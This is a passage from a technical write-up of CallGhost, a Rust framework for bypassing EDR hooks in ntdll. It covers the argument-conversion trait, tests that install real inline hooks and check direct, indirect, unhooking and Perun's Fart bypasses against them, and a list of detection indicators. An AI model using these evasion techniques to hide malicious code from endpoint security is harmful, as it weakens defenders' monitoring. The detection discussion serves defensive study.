Detection surface: The hooks survive. An EDR checking its hook integrity after the call will see them intact. However, each invocation issues four NtProtectVirtualMemory calls (a make-writable and restore-protection pair around both the clean copy in prepare and the copy back in restore), and these are detectable. The window during which the stub is clean is also a TOCTOU gap: a concurrent thread could call the same function during that window and bypass the hook unintentionally.

The SyscallParam Trait

The syscall! macro needs to convert arbitrary Rust types to u64 values for the register/stack arguments. The SyscallParam trait provides this conversion:

// From: callghost-runtime/src/lib.rs
pub trait SyscallParam {
    fn to_u64(self) -> u64;
}

impl SyscallParam for u32 { fn to_u64(self) -> u64 { self as u64 } }
impl SyscallParam for usize { fn to_u64(self) -> u64 { self as u64 } }
impl SyscallParam for i32 { fn to_u64(self) -> u64 { self as u64 } }
impl SyscallParam for isize { fn to_u64(self) -> u64 { self as u64 } }
impl SyscallParam for bool { fn to_u64(self) -> u64 { self as u64 } }
impl<T> SyscallParam for *mut T { fn to_u64(self) -> u64 { self as u64 } }
impl<T> SyscallParam for *const T { fn to_u64(self) -> u64 { self as u64 } }
impl<T> SyscallParam for &T { fn to_u64(self) -> u64 { self as *const T as u64 } }
impl<T> SyscallParam for &mut T { fn to_u64(self) -> u64 { self as *mut T as u64 } }

This means callers can pass &mut handle, 0usize, -1isize, or raw pointers directly. The trait handles the conversion, and the macro generates the binding:

// Generated by macro
let __cg_a0: u64 = (-1isize).to_u64();
let __cg_a1: u64 = (&mut base).to_u64();

Arguments are always padded to at least 4 (the register count), with unused slots set to zero.
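The conversions and the padding rule can be tried in isolation. The sketch below repeats a subset of the trait impls; pad_to_four is a hypothetical runtime helper (the macro pads at expansion time instead) and uses Vec only for brevity.

```rust
/// Conversion of an argument into a 64-bit register/stack slot (subset of the runtime trait).
pub trait SyscallParam {
    fn to_u64(self) -> u64;
}

impl SyscallParam for u32 { fn to_u64(self) -> u64 { self as u64 } } // zero-extends
impl SyscallParam for i32 { fn to_u64(self) -> u64 { self as u64 } } // sign-extends
impl SyscallParam for usize { fn to_u64(self) -> u64 { self as u64 } }
impl SyscallParam for isize { fn to_u64(self) -> u64 { self as u64 } }
impl<T> SyscallParam for *mut T { fn to_u64(self) -> u64 { self as u64 } }
impl<T> SyscallParam for &mut T { fn to_u64(self) -> u64 { self as *mut T as u64 } }

/// Hypothetical helper: pad converted arguments to at least the four register slots.
fn pad_to_four(args: &[u64]) -> Vec<u64> {
    let mut v = args.to_vec();
    while v.len() < 4 {
        v.push(0); // unused register arguments are zero
    }
    v
}
```

One consequence worth knowing: i32 and isize sign-extend, so (-1i32).to_u64() is 0xFFFF_FFFF_FFFF_FFFF, whereas u32 zero-extends. That is exactly what -1isize must produce for the current-process pseudo-handle, and it is harmless when the kernel reads only the low 32 bits of a parameter.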

Test Suite: 23 Tests with Hook Verification and Real File I/O

The test suite in tests/smoke.rs covers hash consistency, SSN resolution, gadget verification, all four bypass methods against real inline hooks, and real-impact file creation via NtCreateFile. The tests require single-threaded execution (cargo test -- --test-threads=1) because the unhook methods modify shared ntdll memory.

The test infrastructure installs real inline hooks by overwriting stub bytes with mov eax, 0xDEAD0001; ret:

// From: tests/smoke.rs
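unsafe fn install_inline_hook(stub: *mut u8) -> [u8; 6] {
    // Precondition: the page containing `stub` must already be writable (ntdll's .text is normally read-execute).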
    let mut saved = [0u8; 6];
    let hook: [u8; 6] = [0xB8, 0x01, 0x00, 0xAD, 0xDE, 0xC3];
    unsafe {
        core::ptr::copy_nonoverlapping(stub, saved.as_mut_ptr(), 6);
        core::ptr::copy_nonoverlapping(hook.as_ptr(), stub, 6);
    }
    saved
}

A HookGuard RAII wrapper manages hook installation and cleanup. It records the clean SSN before hooking and provides verify_hooked() and verify_clean() assertions.

The critical test is hook_itself_works, which proves that calling through a hooked stub actually returns the sentinel value 0xDEAD0001. Without this test, all bypass tests would pass vacuously if hook installation were broken:

// From: tests/smoke.rs
#[test]
fn hook_itself_works() {
    let guard = HookGuard::install(b"NtQueryInformationProcess");
    let hooked_fn: unsafe extern "system" fn(isize, u32, *mut u8, u32, *mut u32) -> i32 =
        unsafe { core::mem::transmute(guard.stub) };
    let mut info = [0u8; 48];
    let mut retlen: u32 = 0;
    let result = unsafe { hooked_fn(-1, 0, info.as_mut_ptr(), 48, &mut retlen) };
    assert_eq!(result as u32, HOOK_SENTINEL,
        "calling through hooked stub should return 0x{:08X}", HOOK_SENTINEL);
}

Each bypass method is then tested against the same hooked stub. The test asserts that the syscall succeeds (returns STATUS_SUCCESS, not 0xDEAD0001) and produces valid data. For the Perun’s Fart method, an additional assertion verifies the hook is still in place after the call.

Real-Impact Tests: NtCreateFile with 11 Arguments

The memory allocation tests prove that syscalls execute correctly, but they operate on anonymous memory that leaves no observable trace. The file creation tests go further: each method calls NtCreateFile with 11 arguments, creates a real file on disk, and verifies it exists using standard Rust std::fs:

// From: tests/smoke.rs
macro_rules! test_file_creation {
    ($test_name:ident, $method:ident, $suffix:expr) => {
        #[test]
        fn $test_name() {
            let path = temp_file_path($suffix);
            let _ = std::fs::remove_file(&path);

            let mut parts = NtFileParts::new(&path);
            let us = parts.unicode_string();
            let oa = NtObjectAttributes {
                length: core::mem::size_of::<NtObjectAttributes>() as u32,
                root_directory: core::ptr::null_mut(),
                object_name: &us,
                attributes: OBJ_CASE_INSENSITIVE,
                security_descriptor: core::ptr::null_mut(),
                security_quality_of_service: core::ptr::null_mut(),
            };
            let mut handle: isize = 0;
            let mut iosb = NtIoStatusBlock { status: 0, information: 0 };

            let status = syscall!($method, NtCreateFile,
                &mut handle,
                GENERIC_WRITE | SYNCHRONIZE_ACCESS,
                &oa,
                &mut iosb,
                core::ptr::null_mut::<u64>(),
                FILE_ATTRIBUTE_NORMAL,
                0u32,
                FILE_OVERWRITE_IF,
                FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE,
                core::ptr::null_mut::<u8>(),
                0u32
            );
            assert_eq!(status, 0,
                "[{}] NtCreateFile failed: 0x{:08X}", stringify!($method), status as u32);

            syscall!(NtClose, handle);
            verify_and_cleanup(&path, stringify!($method));
        }
    };
}

test_file_creation!(direct_creates_real_file, direct, "direct");
test_file_creation!(indirect_creates_real_file, indirect, "indirect");
test_file_creation!(unhook_creates_real_file, unhook, "unhook");
test_file_creation!(perunsfart_creates_real_file, perunsfart, "perunsfart");

NtCreateFile takes 11 arguments: a handle pointer, desired access, object attributes, I/O status block, allocation size, file attributes, share access, create disposition, create options, EA buffer, and EA length [11]. This exercises the buffer-based stack argument handling with 7 extra arguments beyond the 4 register slots. The verify_and_cleanup helper uses std::fs::metadata to confirm the file exists as a regular file, then deletes it. This proves the syscall had a real, observable side effect that persists beyond the process’s address space.

Limitations and Detection Surface

Return address anomaly (direct method). The syscall instruction executes from the caller’s module, not ntdll. EDR products that validate the return address of syscall instructions against known ntdll stub locations will flag this [8]. The indirect method mitigates this specific check but introduces a different signature (gadget reuse).

NtProtectVirtualMemory calls (unhook and perunsfart). Both unhooking methods must temporarily make pages in ntdll’s .text section writable (the whole section, in the case of unhook_all). This PAGE_EXECUTE_READWRITE transition on ntdll memory is a strong IOC, and some EDR products hook NtProtectVirtualMemory specifically to detect it.

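Not thread-safe for unhook/perunsfart. The unhook and Perun’s Fart methods modify shared ntdll memory without synchronization. If two threads run the perunsfart path on the same stub concurrently, thread B’s prepare can save the clean bytes that thread A just wrote; when B later restores them, the hook is silently removed for good. Conversely, A’s restore can reinstate the hook after B has prepared but before B calls through the stub. The test suite requires single-threaded execution for this reason.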

FNV-1a collision risk. The 32-bit hash space means collisions are theoretically possible across ~460 Nt exports. By the birthday bound, the chance that any two of n ≈ 460 names collide is roughly n²/2³³ ≈ 2.5 × 10⁻⁵. In practice, FNV-1a produces no collisions for the ntdll export set, but the framework does not verify this at runtime. A collision would cause the wrong SSN to be returned.
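The missing check is cheap to add. A hypothetical find_collision helper, run over the export names of a given ntdll build in a build script or test, would turn the no-collision assumption into a verified one. It sorts (hash, index) pairs so that equal hashes become adjacent, then compares neighbors:

```rust
/// Same 32-bit FNV-1a as the runtime.
const fn fnv1a(name: &[u8]) -> u32 {
    let mut hash: u32 = 0x811c9dc5;
    let mut i = 0;
    while i < name.len() {
        hash ^= name[i] as u32;
        hash = hash.wrapping_mul(0x01000193);
        i += 1;
    }
    hash
}

/// Indices of the first colliding pair (in hash order), or None if all hashes differ.
fn find_collision(names: &[&[u8]]) -> Option<(usize, usize)> {
    // Pair each hash with its original index, then sort so equal hashes sit side by side.
    let mut hashed: Vec<(u32, usize)> =
        names.iter().enumerate().map(|(i, n)| (fnv1a(n), i)).collect();
    hashed.sort_unstable();
    hashed
        .windows(2)
        .find(|w| w[0].0 == w[1].0)
        .map(|w| (w[0].1, w[1].1))
}
```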

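SSN cache is process-wide and mutable. The cache uses static mut with write_volatile/read_volatile. On x86_64 the hardware behaves as intended (naturally aligned 8-byte stores are atomic), but unsynchronized concurrent access to a static mut is a data race, which is undefined behavior in Rust’s memory model whether or not the accesses are volatile. Replacing the slots with AtomicU64 and Relaxed loads and stores would remove the undefined behavior while still compiling to plain mov instructions on x86_64.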

KnownDlls mapping is not cleaned up automatically. The clean ntdll mapping persists until release_clean_ntdll() is called explicitly. A forensic analyst examining the process’s memory map will see a second image mapping of ntdll.dll, mapped from \KnownDlls\, which is unusual for normal applications.

Drafted with LLM assistance from the CallGhost source code, reviewed and verified against the actual implementation.

References

[1] Elastic Security Labs, “Hooking Techniques in Endpoint Detection”, elastic.co

[2] Microsoft, “x64 ABI conventions: System calls”, learn.microsoft.com

[3] j00ru, “Windows X86-64 System Call Table”, j00ru.vexillium.org

[4] Fowler, Noll, Vo, “FNV Hash”, isthe.com/chongo/tech/comp/fnv

[5] Microsoft, “PEB structure”, learn.microsoft.com

[6] am0nsec, smelly__vx, “Halo’s Gate: Dynamically Resolving Syscall Numbers”, vxunderground.org

[7] Microsoft, “x64 calling convention”, learn.microsoft.com

[8] Elastic Security Labs, “Call Stack Spoofing”, elastic.co

[9] Microsoft, “KnownDLLs Registry Key”, learn.microsoft.com

[10] d0ntrash, “Perun’s Fart”, github.com/d0ntrash

[11] Microsoft, “NtCreateFile function”, learn.microsoft.com